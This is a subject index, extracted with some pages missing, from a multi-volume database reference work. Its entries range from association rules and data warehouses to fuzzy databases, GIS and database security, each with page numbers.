Xu, J. (2007). Formalizing natural-language spatial relations between linear objects with topological and metric properties. International Journal of Geographical Information Science, 21(4), 377-395.
This work was previously published in the International Journal of Knowledge Management, edited by M. Jennex, Volume 4, Issue 3, pp. 64-81, copyright 2008 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Volume I, pp. 1-677 • Volume II, 678-1356 • Volume III, 1357-2010 • Volume IV, 2011-2705
Index
applications grid 1934 apriori algorithm 65 , 2661, 2669 AR (association rules) 517 AR mining 505, 518 AR mining task 512 Ara Irititja Project, The 1462, 1463 Ara Irititja software 1465 archaeological data 1420 archaeological excavation database 1437 archaeological excavations, introduction to 1421 architecture 1372, 1374, 1375 archive databases 1462 ARIADNE (Alliance of Remote Instructional Authoring and Distribution Networks for Europe) 365, 372, 379 arithmetic coding 199 ARPANET (Advanced Research Projects Agency Network) 2109, 2116 arrival pattern 1023, 1024 arrival pattern of transactions 1024 artificial intelligence (AI) 341, 1202 artificial neural network (ANN) 2659 ASSO 441 ARs (association rules) 394, 1320, 2192, 2193, 2194, 2195, 2199, 2201, 2202, 2203, 2545, 2657, 2658, 2659, 2675, 2679, 2680, 2681, 2682, 2683 AR hiding 2273 AR hiding methods 2268 AR mining (ARM) 2660, 2661, 2662, 2680, 2681, 2683 AR based techniques 389 asynchronous collaborative discussion environment 1578 asynchronous collaborative discussion system 1577 asynchronous communication 1681 ATM (automatic teller machine) systems 1754 ATNS (Agreements Treaties and Negotiated Settlements)
2
database 1472 ATNS database, searching 1474 ATNS home page 1474 atomicity 29, 209, 1024 atomicity and isolation (A/I) 1260 attacker 2122 attribute inheritance 445 attribute order dependence 2225, 2229 attributes 394, 2000, 2001, 2002, 2004, 2005, 2006, 2008 audit trail 1882, 2095 audit-based expanded query set size control 2105 Australia, Central 1462 Australia, Central Land Council 1464 Australia, remote 1462 Australia, remote indigenous 1462 Australia, South 1463 Australia, Western 1464 Australian Bureau of Statistics 1468 authentication authorization 2114 automated individual decisions 2092 automatic authorship identification 2131 automatic failover 1916 automatic generation of maps 1576 automating process 1903 autonomous organizations 1447 availability 2108
B B formal method 1168 B Method, overview of 1169 B Method, the 440 B specifications 1173 B specifications, correctness of 1175 B translation 1173 B2B e-commerce 341, 1985 balanced partition 199 bandwidth, low 662 Bank of Jordan 1742 base station (BS) 1262 base64 1381, 1383 basic logic formalism 261 basic sign-off 1263 Bayesian network (BN) 2011
behavioral refinement 441, 452 benchmarks 1232 benchmarks, decision-support 1228 best practices 1292 best-first search 2021 bibliomining 335–336 Big Brother metaphor 1813 binary classification problem 309 binary large objects (BLOBs) 67 binary representation 2158 bioinformatics 794, 1267–1275, 2658, 2683 biological macromolecules 2632 BIOME 379 biomedical informatics 1382 biometric information 1512, 1520–1521 bipolar queries 154 bitmap join indices (BJIs) 2292, 2296, 2297, 2299 bitmaps 197, 2014 Blackboard® 373 blogs (Web logs) 1412–1413 Blue Web’n 379 Boolean attributes 2014 bounded sum 2178 bounded-choice substitution 443 Brazilian health system, the 988 breadth-first (BFS) 2646 Breiman observation 2004 broadcasting 1110, 1115, 1117, 1118, 1124, 1125 Broome 1464 bucket-based histogram 2050 bug assignment 819, 820 bug fixing practices 797 bug-fixing process 805 business environment 940 business information integration 1959 business intelligence 941 business performance management (BPM) 27 business process offshoring (BPO) 1492, 1493, 1494, 1496, 1502, 1505, 1506, 1507 business process re-engineering (BPR) 1949 business rule 219 business systems purpose analysis (BSPA) 1943 business value 866
Index
C caching 1119, 1120, 1121, 1124, 1125 calculation aggregation 1245 Caldicott principles 2095 Canada’s SchoolNet 379 canonical database 2054 CAPDM Sample Interactive LOS 379 cardinalities 2493, 2496 cardinality relationships 2506 CAREO (Campus Alberta Repository for Educational Objects) 365, 379 cascaded star model 656 causal rejection principle 2262, 2267 CBIR (content-based image retrieval) 1189, 1191, 1192, 1195, 1198, 1202 CBIR systems 1189 CBIR systems, color 1198 CBIR systems, initial query 1195 CBIR systems, texture 1198 CBIR, feature analysis and similarity measures 1191 CELEBRATE network 372 cell-level security (CLS) 1669 central processing unit (CPU) 485 centralised database 1468 changes temporal index (CTI) 402 check-out mode 1263 child nodes 207 Chow-Liu trees 2019 CIA 2108 CIMOSA 343 CIMSs (collaborative information management systems) 1446, 1447 CIMSs-proposed solution 1449 CITIDEL 379 city and regional planning/engineering 1754 civil infrastructure status (CIS) 1498 classes 2001 class constraints 446 class-based measures 2637 classification 1320, 2001, 2002, 2004, 2009, 2164 classification problems 2001 classifier 394, 2001
clickstream data 1785 CLOE (Co-operative Learning Object Exchange) 379 clustered model 1259 clustering 49, 394, 1912, 1923, 2000, 2002, 2007, 2008, 2642 clustering techniques 1553 COBOL programming language 206, 208 CODASYL (Conference on Data Systems Languages) 206 Codd, E. F. 206 code of ethics 2084 collaboration 1446 collaboration, need for 1446 collaborative discussion 1576 collaborative networks 1453 color coding scheme 1573 combination-based scheme 2234–2235 commit phase 1989 common data model (CDM) 2473 common gateway interface (CGI) 1575 common practice notation (CPN) view 39 community development 1684 compatibility function 1024 compensating mode 1259 compiled data, anonymisation of 2093 compiled records, tightly controlled use 2093 complex data 648, 649, 650, 651, 657 complexity 2001 compliance check 1796 compressed string structures 199 compressed suffix arrays 199 computational complexity 2556 computational techniques 2001 computer integrated manufacturing (CIM) 338 computer networking 1454 computer networking in cybercafes in Nigeria, data collection 1456 computer networks 1460 computer science teaching center (CSTC) 379 computer security community 2079
computer-aided design 339 computer-aided manufacturing 339 computer-aided process planning 339 computer-based information technology 339 computerized patient record system (CPRS) 486 computer-mediated communication (CMC) 1670 computing paradigm, client-serverbased 485 computing queries 2052 computing tabulating recording (CTR) company 205 conceptual data models 106, 339, 344, 350 conceptual data models, development of 350 conceptual defined sequence 684, 685, 686 conceptual design 98, 346 conceptual modeling 87, 529, 1009, 1010, 1581 conceptual schema 441 concrete motifs 2635 concurrency control 1024 concurrent engineering (CE) 338 condensed representation 2055 confidentiality 186, 2108 Connexions 379 consistency 209, 449, 1024 consistent database 2057 constellation 963, 967 constitutional empowerment 1823 constraint databases 348 constraint-based algorithm 1205 constraint-based multi-dimensional databases 961 constraints 212, 963, 968 constraints, application 446 constraints, explicit 446 constraints, implicit 445 construct definitions 1305 construction cost 521 constructivism 1313 constructs 1445 containment 2060, 2062, 2070 content-based music information retrieval (CBMIR) 36 context 579
3
Index
context objects in spans (CoinS) 1411 context-aware query processing 1844 context-aware service-oriented computing 1864 contextual IQ criteria 2146 contiguous frequent itemsets 2196–2197 continuous availability 1899, 1907 continuous post-deployment communication 1756 continuous quality improvement (CQI) 1349 control system design 2567 control theory 2565, 2566, 2567, 2569, 2570 control-based database tuning 2564 controllability and observability 2570 conventional database system 1021 conventional music notation (CMN) 39 conventional queries 996 convergence 93 convergence rate 2570 cookie poisoning 2127 cookies 2081, 2084, 2113, 2116 coordinate system 1754 coordination theory application 805 copyright 1466 CORBA (common object request broker architecture) 873 CORDRA (content object repository discovery and registration/resolution architecture) 372 corpus 2358 correctness 839 correlation techniques 390 correspondence assertions 2485 cost estimation 2001 cost formula 2546 cost model 660, 669 count aggregation 1245 COUNTER (Counting Online Usage of Networked Electronic Resources) 323–327 coupling, close 787
D daily production 941 data 1754, 2313, 2322 data access 1832–1843 data access agent (DAA) 1258 data access type 1024 data accessibility 1575 data analysis 1763 data and schema conflict resolution strategies 1729 data cleaning 240, 2245–2260 data collection 1762 data collection, method of 1456 data collections, MEDLINE 492, 499 data communication cost (DC) 669 data controllers 2089, 2090, 2091, 2092, 2093, 2094 data cubes, histo-based compression 165–178 data definition language (DDL) 986 data exchange and share 339 data glove 1160 data identicle tuples 2285 data integration 2058 data integration options 1726 data integrity 209 data manipulation 1568 data manipulation language (DML) 986 data mart, handling data changes in 226 data mart, handling schema changes in 229 data marts 222 data models 414, 416, 417, 418, 419, 425, 429, 430, 435, 436, 437, 438, 1003 data models and VQLs 1009 data models, object-relational (OR) 419, 425 data models, flat file 207
Index
data models, hierarchical 207, 211 data models, network 208, 211 data models, relational 208, 211 data online 1839–1843 data partitioning 834, 2292 data perturbation 2268 data perturbation, illustration of 190 data perturbation, security and accuracy 189 data preparation 2002 data pre-processing techniques 2037 data properties 1023 data protection act 2088, 2089, 2093, 2094, 2096, 2098 data protection concern 2085 data protection legislation 2088 data quality 1788 data refinement 441 data replication 834 data sanitization 2273 data selection cost 521 data services infrastructure 1727 data source creation 695 data sources 222 data sources for mining 941 data stream pre-processing 2050 data structure refinement 1179 data structures, semantics of 259 data subjects 1822, 2090 data swapping 2106 data tabular 1839–1843 data transformation 386 data user 1833–1843 data visualization 1152, 1568, 1570 data, collection and storage of 942 data, freshness of 840 data, mapping 2471 data-centric approach 2349, 2350, 2354 DataCube (DC) 2013, 2024 data-integration approaches 2473 data-mining technique 2543 datasets 2001, 2002, 2004, 2005, 2006, 2007, 2008 dataveillance 1808, 1822 Daubechies wavelet 1198 DBs (databases) 207, 211, 1236, 1239, 1240, 1290, 1292, 1460, 1823–1843, 2079, 2084, 2116, 2313, 2314, 2620
DB2 (database 2 universal database) 349, 486, 2142 DBs, abstract 1873 DB administrators (DBAs) 210, 1665, 1669, 2127, 2473, 2564 DB, adults 2555 DB, adults, transaction set for 2562 DB applications, tool for building 1168 DB application system implementer and manager (DASIM) 1283 DB benchmarking 1226, 1233 DB benchmarking, issues 1229 DB benchmarking, tradeoffs 1229 DB binary representation 2165 DB, catalog 2450, 2471 DB clustering 161 DB conceptual schemas 440 DB design 441, 538, 1362 DB design, physical 847, 850 DB, distributed 1919 DBs, distributed and heterogeneous 1447 DB-driven application assignment engine (DATE) 1284 DB-driven portal application 1283 DBs, dynamically linking to ontologies 909 DBs, federated 1453 DBs, federated, architecture 1448 DBs, full-text 1874 DBs, history of 1687 DBs, inductive 1321 DB integration 282, 303, 1928 DB integrity checking 212 DB-like technologies 206 DBs, literature search, online 1874 DB management 1687 DB management systems (DBMSs) 14, 205, 639, 725, 848, 1003, 1021, 1233, 1501, 1667, 1682, 1754, 1959, 2101, 2119, 2127, 2140, 2141 DBMSs customers, roles of 2144 DBMSs, quality of 2145 DB modeling of engineering information 338 DB models 106, 207, 344, 1233 DB models, constructions of 349
DBs, national medical 2085, 2086, 2087, 2088, 2090, 2091, 2092, 2093, 2095, 2096, 2097 DB, natural language 2130 DBs, online library 1867 DBs, online, misuse of 1867, 1867–1875 DBs, ontological support for 911 DB operating cost reduction 2556 DB operations, taxonomy of 1240 DB partitioning 1263, 2547 DBs, project, global characterization of 2000 DB protection countermeasures, application-level 2081 DB protection countermeasures, host level 2081 DB protection countermeasures, network level 2080 DB protection countermeasures, physical and insider 2082 DB queries 1238 DB reconstruction 2273 DB repair 2058 DB sanitization problem 2269 DB schemas 1322, 2349, 2448, 2450, 2453, 2454, 2456, 2457, 2464, 2465, 2470 DB schema interoperability 909 DB schema model 441 DB security 2100 DB server 2084, 2116 DB skills 208 DBs, spatial 396 DBs, spatio-temporal 396 DB-specific issues 2567 DBs, standby 1914 DB state 1322 DB systems (DBSs) 339, 2473 DBSs, heterogeneous 1863 DBSs, intelligent 725 DBs, temporal 223 DB transactions 446 DB transformation 2055 DBs, transient 223 DB tuning 2299 deadline 1022, 1023, 1025, 1031, 1035 decentralized hospital computer program (DHCP) 486 decision process 615
5
Index
decision support systems, spatial (SDSSs) 787 decision trees 941, 2002, 2003, 2009 decision trees as DM method 949 decision trees, C4.5 2002, 2009 decision trees, CART (classification and regression trees) 2002 decision trees, ID3 2002 decision trees, M5 2001, 2002, 2003, 2004, 2007, 2008 decision trees, M5 algorithm 2002 decision trees, M5, construction of 2003 decisional model 99 decision-making processes 648, 655 decison trees, M5P algorithm 2001, 2002, 2007, 2008 declarative vs. procedural 219 decoding 2338 decoding time 2339 deduction 727 deduction, probabilistic 727 defense projects, Cold War era 206 delay freshness 840 Delta State, Nigeria 1454, 1455 DeltaVista 1796 democratic accountability 1823, 1823–1843 denial-of-service (DoS) attacks 385 Department of Homeland Security (DHS) 1514, 1516, 1517–1518 dependencies, discontinuous 745 deployment issues 1468 depth-first manner (DFS) 2646 descriptive attribute 93 design process, security integration 638 design/CPN tools 1026 desktop database 893 desktop file system 207 determined cardinality references 2506 determined data semantics 2506 deterministic motif mining 2632 deterministic motifs 2635 development characteristics 2005
6
DHHS (Department of Health and Human Services) 502 diffusion of innovations 2574 digital computers 206 digital computers, development of 206 digital dossier 1822 digital imaging and communication in medicine (DICOM) 1373 digital information 2616 digital kinship database 956 digital learning object repositories specification 372 Digital Library for Earth System Education 379 digital library, SMETE (science, mathematics, engineering, and technology education) 365 digital manipulatives 900 digital map 1754 digital object identifier (DOI) 1406–1407 digital rights management (DRM) 374 digital satellite images 1754 Digital Scriptorium 380 Digital Think 365 digitation 1754 dimension attribute 91 dimension instances 964 dimensional fact model (DFM) 88 dimensions 962 Dioxin database 2055 directory traversal attack, definition 2127 Dirichlet priors 2019 disaster recovery 1902 disclosure limitation 1823–1843 DiscoveryLink 486 DiscoveryLink, DataJoiner 486 discretionary access control (DAC) 2101, 2102, 2108 discriminant analysis 2169 discrimination networks 728 discussion artifact 1578 disjoint sets 2307 disjunctive datalog program 2058 disjunctive program 2055 display operator 972 disruptive technology 2573
distributed association rule mining 160 distributed classification and regression 158 distributed data mining 157–164 distributed software development 799 DL (description logics) 269, 2362, 2367, 2376, 2382, 2383 DL languages, semantics of 271 DL-Lite, expressiveness 274 DL-Lite, performance with 274 DM (data mining) 36, 240, 334–335, 343, 394, 943, 944, 1152, 1779, 1785, 1822, 2000, 2001, 2002, 2006, 2008, 2012, 2016, 2130, 2164, 2170, 2268, 2641, 2652, 2653 DM activities 948 DM algorithms 941 DM applications 943, 944 DM, as a metaphor 1812 DM, collective framework (CDM) 159 DM ethics 1808 DM ethics, metaphors and models for 1808–1822 DM in manufacturing 944 DM information 941 DM medical databases 1393–1404 DM results 947 DM techniques 944 DM techniques and tools 941 DM, visual (VDM) 1152 document clustering (DC) 933 document object model (DOM) 529 document type definitions (DTDs) 1321, 1383 document-centric documents 347 document-constructor model 2485 domain constraints 213 domain environment 575 domain relational calculus (DRC) 137 downtime 941 drill-down operators 963, 976 drug activity prediction problem 1193 DSpace™ (MIT) 380 DTD (Document Type Definition) 530, 2506
Index
DTD for structured papers 531 DTD-graph mechanism 2061 Dublin Core metadata standard 372 durability 209, 1024 DWs (data warehouses) 86, 222, 241, 571, 637, 658, 847, 2048, 2108, 2324 DW backstage 847 DW design 86 DWs, handling changes in 224 DWs, node-partitioned (NPDWs) 658, 659 DWs, requirements of 576 DW security and access control models 639 DW systems 222 DWs, temporal, design of 233 DWs, temporal, survey on 221 dynamic generation of maps 1575 dynamic hierarchies 96 dynamic multidimensional histograms 172 dynamic one-dimensional histograms 169 dynamic weights 141 dynamic workloads 2564 Dynapi 820
E EACH 2479 eager replication 30 early-repearing 2055 earth geography history 395 ease of use 1873 ebXML core components 1990– 1992 e-commerce (electronic commerce) 1786 economic development 1682, 1683 economic development, differing from IT 1682 economics of technology standards 2574, 2575, 2586 edge-counting algorithm 494 EdNA (Education Network Australia) Online 365, 372, 380 EducaNext (UNIVERSAL) 380 education, 3-D virtual worlds 2595
educational objects economy (EOE) 380 eduSource 372 effective knowledge organization (EKO) 1638, 1639, 1648 EFLWOR expressions 2477 EFLWOR-expression syntax 2478 e-health 484 e-healthcare systems 492 EIGs (elasticity-based IPR groupings) 2693, 2694 EIGs, detecting 2694 EIGs, example of 2694 EIGs, schematic view of 2695 Eisenhower National Clearinghouse for Mathematics and Science Education 380 elasticity 2685 elasticity, characteristics of 2692 elasticity, example of 2693 elasticity-based groupings 2687 elders 1467 electronic data interchange (EDI) 528 electronic health record (EHR) 485, 1386 electronic patient record (EPR) 1386 Electronic Privacy Information Center (EPIC) 1517, 1527 electronic statistics, development of 321 electronic statistics, management of 326 electronic statistics, use of 327 electronic usage statistics 320 element-based scheme 2234 eLera (e-Learning Research and Assessment Network) 380 EM (expectation maximization), analysis of 1564 EM clusters (individual colours) 1560 EM clusters (RGB) 1563 e-manufacturing 354 emergence index 180 emergence index in image databases 179–185 emergence, model of 180 emergency medical services (EMS) 1344 emergency medical technicians (EMTs) 1345
flat file 207, 211 flexibility 866, 871 flexible entity resolution architecture 2248 flexible gap motifs 2635 floating IP addresses 1914 FLOSS (free, libre, and open source) software 797, 2301 FLOSS data 2303 FLOSS development, coordination in 804 FLOSS phenomenon 800 FLOSS projects 2301 FLOSS, conceptual development 800 FLOSS, discussion 821 FLOSS, findings 813 FLOSS, research methodology 807 flow measures 97 FNF2 data model 2277, 2281, 2283 FNF2 fuzzy relation schema 2284 FNF2 fuzzy tuple 2283 FNF2, image retrieval application of 2288 forecasting 2001 Foreign Intelligence Surveillance Act (FISA) 1521 foreign key (FK) 1427 foreign key constraints 213 forensics, applications to 1565 formal competency questions 2387, 2388, 2398, 2399 formalism 214 FPOB hybrid 128 FQUERY 143, 152 fragile watermarking 2228 fragmentation attribute 2299 free and open source software (FOSS) 2572, 2573, 2574, 2576, 2577, 2578, 2579, 2580, 2581, 2583, 2584, 2585, 2586, 2587–2590, 2591 frequency-based matching 2307 frequent itemset hiding 2273 frequent one-sum weighted itemsets 2669 frequent pattern growth tree (FPT) 1051 freshness index by data deviation 840
Index
FTS (full-text search) 933 FTS engine 938 FTS engine interface 935 FTS engine, structure of 934 FULL 2479 full elasticity 2693 full replicas (FRs) 673 full-text indices 198 fully partitioned replicas (FPRs) 674 function approximation 1107 function points 2002 functional data model 1012 fusion places 1026 fuzzy association rules, and distributed mining 2435 fuzzy association rules, and mining 2427–2447 fuzzy attribute 2284 fuzzy clustering 2173, 2176 fuzzy complementation 2284 fuzzy comprehensive method, and apparel comfort 2177 fuzzy conceptual data modeling 106 fuzzy data 2448, 2450, 2454, 2455, 2457, 2458, 2459, 2463, 2464, 2466, 2470, 2471 fuzzy databases 348, 2448, 2450, 2455, 2456, 2459, 2462, 2463, 2464, 2466 fuzzy database management systems 2466, 2471 fuzzy databases, similarity relation-based 146 fuzzy image database (FIB) 2288 fuzzy intersection 2284 fuzzy linear clustering 2166, 2173 fuzzy logic 105, 341, 1495–1496, 1502, 1505, 1506, 1507, 1509, 1510, 2159, 2165 fuzzy logical database modeling 106 fuzzy matching 938 fuzzy metaknowledge base (FMB) 2455 fuzzy object-oriented data models 127 fuzzy pairs 2287 fuzzy possibilistic relational database 145
fuzzy predicates 143, 150 fuzzy preferences, between query conditions 141 fuzzy preferences, inside query conditions 140 fuzzy querying, of fuzzy relational databases 144 fuzzy querying, protoforms 1040 fuzzy search 1800 fuzzy searching and Arabic/Asian names 1802 fuzzy set theory 342 fuzzy sets 107, 1133, 1137, 1138, 2165 fuzzy sets, and neural networks 2169 fuzzy similarity calculation 2161 fuzzy similarity representation 2160 fuzzy similarity representation, model for 2160 fuzzy union 2284
G Gaim 820 gap constraint 2636 Gateway to Educational Materials (SM) (GEM) Consortium 380 GDP value 207 GEFRED 146 gene analysis 2642 genealogy 956 General Electric 206 general public license (GPL) 888 generalized additive perturbation process (GADP) 189 generalized substitution language (GSL) 443 genetic algorithm 2021 genomics research network architecture (gRNA) 1269 geographic data mining 791 geographic ontology 2410 geographic position coordinates 1570 Geomedia software 1741 geo-ontology 2405–2426 GeoSensors 790 geospatial component 785, 786, 787, 790 geospatial data layers 1749
Geotechnical, Rock and Water Resources Library 380 geovisualization 786 GISs (geographical information systems) 395, 778, 779, 780, 783, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 795, 796, 1015, 1445, 1570, 1682, 1691, 1741, 1754, 2685 GISs (graphical information systems ) 210 GIS applications 395 GIS knowledge infrastructure, environmental 778 GIS-based interactive database system 1741 global constraint checking 566 global database system (GDBS) 1258 GEODE (Global Education Online Depository and Exchange) 381 Global Grid Forum 1268 global manufacturing 338 global positioning system (GPS) 210, 780, 1570, 1755 global rollback 862 global schema 2053 global semantic integrity constraints 550 global-as-view (GAV) 2474 globalized technology society 1823 GNU 2386 goal-oriented requirement engineering 570 Google Earth 395, 397 Google Earth, main layout 398 Google Earth, sample queries 397–400 Google Earth, user solution 397 Google hacking attack 2127 Google Scholar 1410–1411 government 1685, 1829–1843 government agencies 1723 government portal 2109 government, as consumer 1686 government, as regulator 1685 grammar, context-free 728 grammar, context-free phrasestructure 743
I IBM (International Business Machines) 206 Iconex 381 ICTs, international 1876, 1877 IDEAS (Interactive Dialogue with Educators from Across the State) 381 IDEF1X 344 identifiability 1672, 1681 identity concept 4 identity theft 1519, 1525, 1822 IDS (integrated data store) 206 IDS, overview of 384 IEEE Learning Technology Standards Committee (LTSC) 364 illegal immigration 1524–1525 iLumina 381 image analysis 62 image archive module 1387 image databases 2275 image mining 1552 image representation 1198, 2277 image retrieval 61, 68, 73, 81, 1189, 1191, 1195, 1202 image retrieval problem 2279 image retrieval, content-based (CBIR) 179 image segmentation 1198 images 1193 imprecision 341, 1024, 1025, 1032 IMS (information management system) 206 IMS Global Learning Consortium Inc. 370, 372–373 inclusion 968 inconsistency 2052 inconsistency tolerance 220
Index
inconsistent database 2058 incremental development cycle 1290 indexed attribute 2293, 2300 indexer 938 indexing, temporal 402 indices, dynamic 198 indices, static 198 indigenous knowledge systems 1468 indigenous peoples 1462 individual autonomy 1823 induction algorithm 394 information access 1733, 1823 information compression 748 information extraction (IE) 932, 2130, 2131 information gain (IG) 2641 information grid 1934 information interpretation system 1571, 1572, 1578 information justice 1823 information modeling 2, 339 information modeling, philosophical foundations of 1–12 information organization (IO) 1824–1843 information privacy 1823 information processing 1638, 1640, 1643, 1646, 1647 information retrieval 196, 726, 1731 information security defense curves 1523 information sharing 1723 information space, dynamic organization 907 information storage 1730 information systems 338, 1664 information, imperfect 106 information, imprecise and uncertain 105 information-exchange dilemma 1681 infrastructure grid 1934 initialization 446 inner product 1093, 1094, 1095, 1097, 1099, 1100 insider countermeasures 2082 insider threats 2115 instance 394, 1193 instance-level methods 290
institutional review board (IRB) 1837–1843 instructional technology 1867 integrated care records 2095 integrating databases 2473 integration 866, 871, 2052 integration efforts 274 integration strategy 2482 integration-mechanism architecture 2483 integrity 220, 2108 integrity checking 220 integrity checking, simplified incremental 213 integrity constraints 212, 220, 2053, 2058 integrity constraints, declarative 219 integrity constraints, dynamic 220 integrity constraints, procedural 219 integrity constraints, static 220 integrity enforcement 220 integrity satisfaction 220 integrity theory 213 integrity violation 220 intelligence for engineering 341 intelligent discovery assistant 656 interactive data access environment 1576 interactive digital archive 1463 interactive navigation 1159 interactive television (iTV) 1479 inter-dimension constraints 968 interface design 1464 internal consistency 1024 internal privacy review board 1837–1843 International Software Benchmarking Standards Group (ISBSG) 2001, 2005, 2008 international standardization organization (ISO) 1383 Internet 485, 1468 Internet applications 1437, 1445 Internet applications, databases for 1420 Internet control message protocol (ICMP) 2116 Internet protocol television (IPTV) 1477, 1477–1486 Internet-based applications 1915
inter-ontology relationships 910 interpretation system 1568 intersymbol interference (ISI) 1085 interview-based qualitative data 1876 intra-dimension constraints 968 intrinsic IQ criteria 2145 intrusion detection intrusion detection system (IDS) 394 intuitionistic sets 1128, 1136, 1146, 1148 inverse frequent itemset mining 2274 inverted files 197 inverted index 938 invertibility 2230–2231 investment errors 1788 investment portfolios, allocating patterns 2657 investment-item return prediction 2658 investment-item selection 2658 investment-item weight determination 2658 IP security (IPsec) 2084 IPRs (inconsistent pair-wise relations) 2690 IPRs, balanced 2694 IPRs, elasticity analysis of 2691 IPRs, examples of 2690 IPRs, graphical representation of 2690 IPRs, unbalanced 2693 iRevive 1347 iRevive system architecture 1348 Irrunytju (Wingellina WA) 1464 IS (information systems) 615, 866 IS capabilities 866, 868, 869 islands of applications 1935 islands of computing 1935 ISO (International Organization for Standardization) 344 isolation 1024 IS-UML class diagrams 1173 IS-UML diagrams 1173 IT (information technology) 62, 1682, 1756 IT applications in practice 1694 IT best practices 1462 IT business value (ITBV) 866, 869
11
Index
IT investments 866 IT payoff paradox 866 IT standards 1529 IT&T infrastructure 1468 IT/economic development revolutions 1687 IU (Interactive University) Project 381
multivariate Gaussian 2019 multivariate linear regression (MLR) 2001 multiversion concurrency control (MVCC) 841 music data mining 35 music information retrieval (MIR) 38 musical analysis 35 Mutitjulu (Uluru NT) 1464 mutual exclusion metrics 2197– 2199 MXQuery 2473, 2476 MXQuery, usage 2480 myGrid 1269 MySQL 17, 207
N naïve Bayes classification 1403 NAME(n) function 2480 namespaces 1320 n-ary relationships 2493, 2506 NASA (National Aeronautics and Space Administration) 206 national health service (NHS connecting for health) 2086, 2087 national ID card 1526 national identification number (NINo) 2088 National Learning Network: Materials 382 national security 1513, 1521 National Security Agency of the Slovak Republic 2110 national security letters (NSL) 1521–1522 natural language front ends 747 natural language syntax 747 natural language, analysis and production of 726 natural language, analysis of 726 near real time (NRT) 849 nearest neighbour (NN) 51 NEEDS 382 negative elasticity 2692 negotiation 1025, 1032, 1033, 1034 neighboring objects 2687 NEON (National Ecological Observatory Network) 779 Nepabunna 1464
Index
Nest 978 nesting 1975 NetCube 2012, 2021, 2031 network availability levels (5Nines) 1900 network level threats 2111 network model 208, 1460 networkable database 1309 network-level countermeasures 2080 networks 726, 728 Ngaanyatjarra Council 1464 NIME (National Institute of Multimedia Education) 372 Niri-Niri 1468, 1469 NISO (National Information Standards Organization) 487 NIST Model 2103, 2107 NIST Model of RBAC 2103 NMC (New Media Consortium) 364 NNs (neural networks) 1189, 1191, 1194, 1198, 1199, 1200 NNs, computing 2168 NNs, classification 1403 NNs, feed-forward 1194, 1199 node swapping 2212 nominal attributes 2004 nominal attributes, transformation of 2004 non-collaborative servers 1108, 1109, 1110, 1111, 1112, 1113, 1115, 1116, 1118, 1122, 1123 non-monotonic reasoning paradigm 2261 nonstandard/complex transformation 849 normalization 209, 211, 2065, 2066 normalized work effort 2002, 2006 Northern Territory Library and Information Service 1464 NSDL (National Science, Mathematics, Engineering, and Technology Education Digital Library) 382 NULL 2480 Nyquist-Shannon sampling theorem 2568, 2570 NYSIIS 1801
database 2666 one-to-many relationships 208 online assessment, types of 1292 online assessments, electronic tools for 1291 online assessments, evaluation of 1293 online asynchronous collaborative discussion environment 1576 online communities 1576 online data 1839, 1839–1843 online decision support systems (ODSS) 829 online transactional processing 2100 on-mobile location-dependent information processin 1255 onomastics 1802 ontologies 1453, 2348, 2410, 2448, 2449, 2450, 2451, 2452, 2453, 2454, 2455, 2456, 2457, 2458, 2459, 2460, 2462, 2464, 2465, 2466, 2467, 2468, 2469, 2470, 2471 ontology management systems 2452 OO (object-oriented) conceptual model 573 OO database 487 OO model 442, 726 open source code forges 2301 open source databases (OSDBs) 887, 893 open word assumption (OWA) 265, 2377 openURL 1406–1407 OpenVES 382 operating systems (OSs) 1501, 1508, 1904 operation and maintenance (O&M) 862 operational linkages 874 opportunistic data structures 199 optimistic combination 2285 optimization 214 optional arc 93 optional sources 2485 optomistic and combinations 2286 Oracle 206, 349 Oracle database grid 1930
15
Index
Oracle grid 1669 Oracle grid control 1931 Oracle text 935 organizational decision support 1604 organizational learning 1638, 1640, 1644, 1649 organizational model 99 OSS (open source software) 887 OSS development teams 797 outcomes-based curriculum 1313 outer product 1085, 1093, 1094, 1095, 1097, 1102 outlier 394 outlier detection 394 outsourced database service (ODBS) 2204, 2205–2207, 2208, 2209, 2213, 2215, 2216, 2219 ownership proof 2224, 2230, 2234, 2241
P PALS (Publishers and Librarian Solutions) 323 parallel join 660 parallelism 847, 854 parameterized views 1666 parameters 965 parsing 745 partial elasticity 2693 partial global serialization graph (PGSG) 1260 participation 2493, 2502 participation relationships 2506 partition and replicate strategy (PRS) 662, 666 partitioned replicas (PRs) 674 partitioning 660, 851, 968 partitioning method 441 partitioning strategies 666 patient information system, wireless integration of 1357 patient record number (PRN) 1387, 1388, 1389, 1390 patrilineal genealogy 958 pattern recognition 726 PBS TeacherSource 382 PDAs (personal digital assistants) 1310 PDAs, interfaces and connectivity 1365
16
Peppimenarti 1464 performance comparison 1200 performance evaluation 1226 performance measurement metric 1200 performance measurement tools 1226 performance metrics 1025, 1033, 1233 performance requirements 1447 PERINORM database 1529 periodic data 225 periodicity 1035 personal data 2088 perturbation approaches 2270 perturbation-based techniques 2105 perturbed database 2274 Petri net 1026 PFRD-H (hash-partition fact and replicate dimensions strategy) 667 phishing 1822 Phpmyadmin 820 physical algebra 2510, 2518 physical countermeasures 2082 physical design alternatives 834 physical model 1010 pipelining 847, 854 Pitjantjatjara 1462 Pitjantjatjara Land Rights Act 1981 1462 planned disconnection mode 1263 pods sensor networks 1571 point-in-time recovery (PiTR) 21 policy 1472 policy function 1664 politics 1802 polytrees 2019 Port Augusta 1464 portable document format (PDF) 1383 portfolio management 2657 portfolio selection 2658 position weight matrices (PWM) 2633 positioning aggregation 1245 possibilistic approach 145 possibilistic model 148 possibility distribution 107, 138 post-deployment IT changes 1756, 1773
PostgreSQL database 1572, 1574 post-join 1256 post-pruning 2004 PoTree 404 precision 1734 pre-conditioned substitution 443 Pred(%) 2007, 2008 predicate 1669 predicate logic 261 prediction at level l 2005 prehospital database system 1344 prehospital patient care records (PCRs) 1345, 1348 pre-join 1256 prepare phase 1989 pre-serialization transaction management model 1260 previous knowledge 836 primary artifacts 896 primary-key criticality 2225, 2229 prime factor encoding algorithm 2330 prime factor encoding scheme 2328 prime factor scheme 2328 prime index tree 2330 principle of irrelevance of syntax 2267 printed circuit board 1085, 1086, 1087, 1088, 1090 privacy conscious entities (PCEs) 2131 privacy legislation in the European Union 1831–1843 privacy preserving data mining 2268, 2274 probabilistic inference 2023 probabilistic reasoning 726 probabilistic relational models 2016 probabilistic weight matrix 2634 probability 728 probability distribution function (PDF) 2015 problem solving environments 1453 problem transformation (PT) methods 316 processes, coordination in 802 product characteristics 2005 product data management (PDM) system 340
Index
